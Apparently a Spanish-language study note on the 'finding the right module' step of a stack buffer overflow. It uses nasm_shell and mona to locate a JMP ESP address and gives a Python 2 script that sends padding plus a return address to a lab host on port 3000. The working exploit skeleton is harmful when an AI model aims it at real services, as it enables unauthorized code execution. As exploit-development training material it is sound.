Finding The Right Module
Última actualización
Última actualización
// /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
nasm > jmp esp
00000000 FFE4 jmp esp
## Con el comando previo se explica de donde sale el ffe4!mona jmp -r esp -cpb "\x00\x11\x40\x5f\xb8\xee"
# Este comando es equivalente al previo pero con los badChars#!/usr/bin/python2.7
import sys, socket
# El valor del address lo tomas del primer resultado del comando find de mona
#Address=625011AF
# \xAF\x11\x50\x62 Este valor le sigue al OFFSET
shellcode = "A" * VALOR_DEL_OFFSET + "\xAF\x11\x50\x62"
while True:
try:
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('10.10.10.111',3000))
s.send(('FUNCION /.:/' + shellcode))
s.close()
except:
print "Server error"
sys.exit()# Click derecho
# GO TO
# EXPRESSION
Configurar la expression con el valor del address a buscar